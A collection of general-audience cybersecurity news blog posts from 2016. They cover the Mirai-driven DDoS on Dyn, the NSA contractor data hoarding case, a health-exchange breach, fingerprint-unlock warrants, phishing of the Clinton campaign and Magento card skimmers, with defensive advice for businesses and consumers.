The Day The Internet Died

Well, not exactly, but close.  And it was not due to pictures of Kim Kardashian.

Here is what happened.

When you type in the name of a website to visit, say, the Internet needs to translate that name into an address.  That address might look like .

The software that translates those names to numbers is called DNS or Domain Name System.  DNS services are provided by many different companies, but, typically, any given web site uses one of these providers.  The big providers work hard to provide a robust and speedy service because to load a single web page may require many DNS lookups.

One provider that a lot of big websites use is called Dyn (pronounced dine).  Today Dyn was attacked by hackers.  The attack technique is called a Distributed Denial of Service Attack or DDoS.  DDoS is a fancy term for drowning a web site in far more traffic than it can handle until it cannot perform the tasks that customers expect it to do.

In this case, customers included sites like Amazon, Paypal, Twitter, Spotify and many others.  These sites were not down, it was just that customers could not get to them.

The attacks started on the east coast, but added the west coast later.  Here is a map that pictures where the worst of the attack was.  In this picture from, red is bad.


There were multiple attacks, both yesterday and today.  The attackers would attack the site for a few hours, the attack would let up and then start over again.  For the moment, the attack seems to be over, but that doesn’t mean that it won’t start back up again tomorrow, Monday or in two weeks.

You may remember I wrote about the DDoS attack against Brian Krebs web site and the hosting site OVH.  Those two attacks were massive – 600 gigabits per second in the Krebs attack and over 1 tb per second in the OVH attack.  The attackers used zombie security cameras and DVRs and the Marai attack software to launch these two attacks.

After these attacks, the attacker posted the Mirai software online for free and other attackers have downloaded it and modified it, but it still uses cameras and other Internet of Things devices that have the default factory passwords in place.

As of now, we don’t know how big this attack was, but we do know that at least part of it was based on the Mirai software.  And that it was large.  No, HUGE.

It is estimated that the network of compromised Internet of Things, just in the Mirai network,  includes at least a half million devices.  Earlier reports said that the number of devices participating in this attack was only a fraction of the total 500,000 – which means that the attack could get much bigger and badder.

The problem with “fixing” this problem is that it means one of two things: Fixing the likely millions of compromised Internet of Things devices that are part of some compromised attack network or shutting there devices down – disconnecting them from the Internet.

The first option is almost impossible.  It would require a massive effort to find the owners of all these devices, contact them, remove the malware and install patches if required.  ISPs don’t want to do this because it would be very expensive and they don’t have the margin to do that.

The second option has potential legal problems – can the ISP disconnect those users?  Some people would say that the actions of the infected devices, intentional or not, likely violates the ISP’s terms of service, so they could shut them down.  However, remember, that for most users, if the camera is at their home or business, shutting down the camera would likely meaning kicking everyone at the home or business off the Internet.  ISPs don’t want to do that because it will tick off customers, who might leave.

Since there is no requirement for users to change the default password in order to get their cameras to work, many users don’t change them.  Vendors COULD force the users to create a unique strong password when they install their IoT devices, but users forget them and that causes tech support calls, the cost of which comes out of profit.

As a result of all these unpalatable choices, the problem is likely to continue into the future for quite a while.

Next time, instead of Twitter going down, maybe they will attack the banking infrastructure or the power grid.  The good news is that most election systems are stuck way back in the stone age and they are more likely to suffer from hanging chads than hackers.

Until IoT manufacturers and owners decide to take security seriously – and I am not counting on that happening any time soon – these attacks will only get worse.

So, get ready for more attacks.

One thing to consider.  If your firm is attacked, how does that impact your business and do you have a plan to deal with it?

The thousands of web sites that were down yesterday and today were, for the most part, irrelevant collateral damage to the attacks.  Next time your site could be part of the collateral damage.  Are you ready?

Information for this post came from Motherboard and Wired.


Facebooktwitterredditlinkedinmailby feather

The Insider Threat – At The NSA!

Photo from Flickr; Courtesy Fort Meade public affairs office

Some of you probably remember Edward Snowden (just kidding!).  Snowden was a Booz, Allen, Hamilton employee, on contract to the NSA.  Well now there is another Snowden at Booz.

Booz has annual revenue in excess of $5 billion and has contracts all over the federal government.

Earlier this month, the feds arrested Harold Thomas Martin III, another Booz employee assigned to the NSA.  Remember that package of cyber exploits that hit the dark web a couple of months ago that was thought be be an NSA toolkit lost in the wild?  Well, the feds are saying that was the work of Martin.  Earlier this month they arrested Martin and charged him with theft of government property and unauthorized removal and retention of classified materials.

If that was all, it would be an interesting story, but not news worthy.

As the story unfolds, the feds are now saying that they have found 50,000,000,000,000 bytes of stolen data in his house and car;  most of it out in the open (all though, I am not sure that makes much of a difference under the circumstances).   If you are not sure how to read a number with that many zeros, it is 50,000 gigabytes or 50 terabytes.

The 50,000 gigabyte number, the court filings say, is a conservative number, so it is likely more.

If we were talking about Netflix standard definition movies to compare with, streaming 24 hours a day, 7 days a week, that much data represents watching Netflix, non-stop for almost 6 years.  If the movies were HD, it only represents 2-3 years of 24×7 watching.

Martin, who lives in Glen Burnie, MD, near NSA HQ, has apparently been taking this data since 1996.  That makes it one of the longest running undetected cases of espionage ever.

Unlike Snowden however, it appears, so far, that he didn’t have a goal to release this data or sell it to the Ruskies, but rather, he was hoarding it.  AT LEAST, THAT IS WHAT THEY ARE SAYING NOW.

For the NSA, this is another huge black eye.

For Booz, Allen, Hamilton, it (hopefully) makes government customers leery of their ability to protect classified customer information.  First Snowden and now Martin.

For average citizens, it should make them skeptical of the government’s claims that information that is shared with them can realistically be protected.  Certainly it should call into question the government’s ability – or for that matter anyone’s ability – to keep millions of encryption keys secret.

This is the downside of the digital world.  If he had to carry those 50,000 gigabytes of data out in paper, it would represent 25 billion pages of text – definitely harder to steal and even harder to store.

It also points to the insider threat problem at most companies – who are likely not as secure as the NSA.

This is likely not the end of this story.  All I can say is holy cow!

Information for this post came from The Washington Post and USA Today.

Facebooktwitterredditlinkedinmailby feather

Challenges of Electronic Health Records

You may need a scorecard to keep track of the players, but ponder this.

Codman Square Health Center in Boston reported a breach to HHS.  However, it was not THEIR system that was breached.

Codman participates in a regional Health Information Exchange, the New England Healthcare Exchange, a mandated mechanism for doctors to exchange information with other covered entities, as part of the Affordable Care Act.

An employee of an outside vendor accessed the exchange using an employee’s login information.  With this login they were able to access a few of Codman Health’s customer’s records, but also thousands of records, stored on the exchange but belonging to other providers.  These are records that Codman Square Health had no legitimate permission to access.

Codman Square Health said that data that was accessed includes names, addresses, birth dates, gender, medical services, payor information, insurance information and socials.

But there is a challenge.  Of the data accessed, 140 of those records belonged to Codman Square Health’s patients.  But there were 4,000 other records that were accessed.  These were not Codman Square Health’s clients, so they don’t have access to those records and have no way to tell them that their data was breached.  HIPAA regulations ASSUMED that a provider would have access to the addresses of the patients in the breached records, but in this case, they do not know who those people are.

Those 4,000 victims may never know that their data was hacked.

Will people be unwilling to share their data on the exchange?  Do they even have the option not to share the data?

More importantly, do the regulations need to be fixed?  How do we protect people – which is really what is important.

If we are going to store health care information electronically and share it between parties, then we are going to need to figure out how to deal with breaches that affect multiple parties.

One possibility is to require the Health Exchange to make the notifications, possibly billing the cost back to the responsible party or parties.

But it also means that HIEs need to deal with the security issues.  If they do not, then Health Exchanges may not survive.


Information for this post came from Fierce Health IT.


Facebooktwitterredditlinkedinmailby feather

Feds Serve Warrant Demanding Fingerprints of Everyone in the Building

As has been predicted, in a court filing from May 2016, the DoJ authorized the cops to

“depress the fingerprints and thumbprints of every person who is located at the subject premises during the execution of the search and who is reasonably believed by law enforcement to be the user of a fingerprint sensor-enabled device that is located at the subject premises and falls within the scope of the warrant.”

The US Attorney for the Central District of California said that they don’t know what people or devices might be in the premises, it has demonstrated probable cause that evidence may exist at the search location and needs the ability to gain access to those devices and maintain access to search them.

“The warrant authorizes the seizure of passwords, encryption keys and other access devices that may be necessary to access the device.”

Since companies like Apple and Google have been somewhat less than cooperative with the Feds (witness the FBI-Apple lawsuit over the use of the All Writs Act), the Feds have gotten creative.

While the feds might be able to physically force you to put your finger on your phone, while the warrant may say that they can make you turn over your password, they can’t choke it out of you – at least not legally.

If there is a warrant and the warrant asks you to give them your password, you at least have the option to go before a judge and make your case that you shouldn’t have to do that.  You may have to go to jail in the meantime, so you have to decide how important it is to you.

Apparently, this is not the first time that police got a court’s authorization to make people press their fingers onto a phone.  That distinction may have happened in Los Angeles in February of this year.

While the search warrant may require a person to press here, that may or may not actually work, depending on things like how long it has been since the phone was last unlocked.

If that is a concern for you, then the experts say, do not use the fingerprint reader to unlock the phone.

Most – but not all – courts have ruled that the police cannot compel you to enter your password.  In most courts interpretation, that is too much like compelling testimony in violation of the Fifth Amendment.

In one case, the police had someone create a fake fingerprint to fool a Galaxy 6.  That worked and the person who did that, said that the fake fingerprint would work on a Galaxy 7 and iPhone 6.

Depending on what they are looking for – such as texts (SMS messages) – those may be available from the phone’s carrier.  If they are looking for iMessages, WhatsApp messages of other digital messages, those messages are not available from the carrier, so the only way to get them would be to unlock the phone.

On some phones the user can set the amount of time that can pass since the last fingerprint scan before the password is required and also the number of failed fingerprint attempts that require a password be entered.

Assuming the phone in question allows this (My Galaxy Note does not appear to have those features), then setting those thresholds lower make this technique less effective.  For example, setting the failed fingerprint read to one before requiring a password makes this warrant technique less useful, but likely also requires you to enter your password more frequently.

As always, we have a trade-off between security and convenience.

If bad guys are after you, they may also “ask” you to put your finger on the phone to unlock it, but in that case, if it doesn’t work, they might “ask” you to unlock the phone as an alternative to killing you.

It appears, that if security is your concern, that you should not use the fingerprint, just like you should not use a 4 digit numeric PIN.  An 8-16 digit alphanumeric password is quite effective at stymieing and current brute force techniques.  And less convenient for you. Security.  Convenience.  Pick one.

This is a cat and mouse game, so both the bad guys and the police are advancing the technology while the law is desperately trying to catch up.

Information for this post came from Forbes.


Facebooktwitterredditlinkedinmailby feather

Why Employee Training is a CRITICAL Component of Security Training

According to Buzzfeed, nine days after Hillary Clinton had won big on Super Tuesday, the Russians launched their cyber attack on her campaign.

The Russians sent malicious emails to all of her senior campaign staff.  The emails looked like standard Google GMail emails alerting to suspicious activity on their accounts and asked them to click on the link.  The link led to a page, likely hosted in Russia, that looked very much like a GMail password reset page.  Unless they checked the address in the address bar.

As soon as they entered their email and password, the Russians had full, unfettered access to all of their emails from that point forward.

POINT #1: Call me paranoid, but from a security standpoint does it really make sense to use GMail for the official campaign email system for a presidential campaign?  Sure, that make sense for uncle Joe in Pittsburgh, but did it never occur to anyone that this might not be very smart?

POINT #2:   Did campaign workers receive any cyber security training?  That is a pretty normal phishing technique.  Out of all the people who received these emails, did not even one of them question it?

POINT #3:  If they did question it, did the campaign have a chief cyber security staffer to send the concern to?  Not physical security, but cyber security.

But I digress….

Since that worked so well, the Russians tried the same trick with the Democratic National Committee.

POINT #4:  Did (or does) the DNC  train its people on phishing?

And then, being successful beyond their dreams, they tried the same trick with the Democratic  Congressional Campaign Committee.

POINT #5:   I am not even going to ask.

By mid June, the first leak had been identified and the DNC emails started coming to light.

I assume that others started to panic at this point and those who didn’t use email (like Trump, apparently) were laughing.

The group that orchestrated this is known as APT 28 or Fancy Bear, but there is nothing fancy about this attack.  In fact, a fifth grader could have likely done it.

In a rare display of political annoyance, the White House definitively said last week that Russia did this.  There was no beating around the bush.  The Department of Defense piled on.  I am sure that there is a fair bit of classified evidence, but apparently, the government was convinced enough to publicly blame Putin.

If you want more details, please read the Buzzfeed article below, but for the purposes of this post, this is sufficient.

After reading this, I have a few thoughts and those thoughts apply to everyone – political parties on any side of the fence, businesses or private citizens.

THOUGHT #1 : Email is private – until you hit the send button.  Beyond that, all bets are off.

THOUGHT #2: If you would be concerned, embarrassed or thrown in jail if that email appeared on the front page of the New York Post (or Wall Street Journal), DO NOT SEND IT!  You just cannot guarantee what will happen after you hit the send button.

THOUGHT #3:  At the very least, a private email server gives you some more control and the ability to monitor traffic.  BUT ONLY IF YOU DO IT RIGHT.  It is 10 times easier to do it wrong than to do it right.

THOUGHT #4: Encrypted email (and I don’t mean SSL based web mail) also helps, but again, the devil is in the details.  I have a few patents with my name on them in this area, so I think I understand the problem, what works and what doesn’t work.

THOUGHT #5: Training is critical.  Really.  Human beings are always the weak spot.  Period.  Invest in training.

THOUGHT #6: Monitoring and alerting is the next most critical thing.  If, by chance, the Ruskies accidentally logged in from Russia, alarm bells should have gone off.  There is no monitoring for users of GMail.  You are on your own.

THOUGHT #7:  I like Sergey Brin and Larry Page.  Google is a great search engine.  Not so much is it a great enterprise email solution, even though they would argue with me.  Vehemently.  But then, I am calling their baby ugly.  U.G.L.Y!  Sorry.

THOUGHT #8, 9 and 10:  If security and privacy is important to your organization – and they may not be – then treat it that way.  Find the expertise and hire it (#8).  Listen to what they tell you to do (#9).  And tell your users that this is not a democracy and they don’t get a vote on whether or not to follow the security policies (#10).

I know that is harsh, but the question is, is security and privacy important to you.

Information for this post came from Buzzfeed.



Facebooktwitterredditlinkedinmailby feather

Hackers Use Virtual Skimmers To Steal Credit Cards From Web Sites

You’ve probably heard about credit card skimmers that hackers attach to everything from gas pumps to ATMs to self checkout terminals at grocery stores, all in an effort to steal your credit card info.

As more stores go to chip based credit cards where stealing the information off the stripe won’t let hackers use that card in the physical world, the hackers have adapted their actions to the virtual world.  And, not surprisingly, virtual merchants are denying reality like physical merchants did until the wakeup calls were received from the likes of Target, Home Depot and Wendy’s.

So what are they doing?  I’m glad you asked!

They are installing virtual skimmers on hackable web sites.  With a virtual skimmer, the hacker inserts him or her self in between the user and the credit card processor on  the web page where it captures your credit card.

This technique will only work if the web site can be compromised so that the hacker can modify the correct web page.

This particular attack works on the magento ecommerce platform that many sites are built on top of.  Especially for those sites that do not install patches ever or do not install patches promptly, if the hackers can find the site before the patches are installed, they may be able to add their virtual skimmer to the site.  It is highly unlikely that those sites would detect that the site had been modified because, like with a physical world skimmer, after the data is captured and sent to China, Russia or Ukraine, it is forwarded on to the credit card processor.  The site gets its money and the hacker gets the credit card data.

So far, a Dutch researcher has found the virtual skimmer software on 6,000 online stores.  He says that number is growing at a rate of 85 new stores every day.  The good news (for the hacker) is that these are mostly small stores and are 99% unlikely to figure out that they have been hacked unless the FBI comes to visit them.  That is unlikely to happen because the FBI is busy with the likes of Vera Bradley.

What this means is that these sites will continue to let the hackers steal credit card data until the banks figure out that they are the source and cancel their credit card merchant account and sue them.  Then the site goes out of business because most of them are small enough not to have cyber insurance.  Of course, going out of business may or may not cause the lawsuit to go away, so for at least some of those web sites, the bank will probably get a default judgement against them and that will cause them to, possibly, have to file for bankruptcy protection or pay off the bank.  Not a pretty picture, to be honest.

So who are these sites that have a virtual skimmer installed?

One is the Republican Senatorial Committee’s online store.

When The Register asked the Republican Senatorial Committee if they had secured their web site or if customers coming to their web site were safe from hackers, they got the silent treatment.  My suggestion would be for people to not provide their credit card to any Republican web site until we have a positive statement from them that they have fixed the problem and that using your credit card there is safe again.  Obviously, it is embarrassing, especially during an election cycle, to tell donors that you have been hacked.  The researcher said that he told the Republicans about the problem and they also did not respond to him, but that they removed that script.

The researcher said that as far as he can tell this particular hack has been going on since May of last year, but unlike stopping the attack at Vera Bradley, stopping this attack would require getting at least tens of thousands of web sites to patch their software and likely hire someone to remove the malware. These site owners are small businesses, for the most part, and don’t have the skill to do it themselves.

Some of the sites that the researcher contacted said “thanks, but we are safe, no worries” or “we are safe because we use https” or “we are safe because we have the Symantec security seal”.  That is the denial part I was talking about earlier.

The researcher has discovered 9 variations of the scripts.  Does that mean 9 hacking organizations are using this technique or just that the developer has a commitment to continuous improvement and is iterating the technology?

What is likely to occur, now that the media is reporting this, is for other hackers to figure out how to replicate this and find other unpatched web sites that can be infected, whether they are running Magento or something else.

eCommerce web sites should pay attention to this as they may be held liable by the credit card companies and have to foot the bill for the fraud.  And, of course, they need to install patches very quickly so that hackers don’t have a window to attack them prior to installing the patches.

For customers, watch your statements, but even more important, turn on the text alerts that almost all banks offer to get a text when your card has been used.  If people would do that, it would kill the credit card theft business overnight because cards would be good for one fraudulent transaction, at most, which is a pretty slim payday.






Information for this post came from The Register.

Facebooktwitterredditlinkedinmailby feather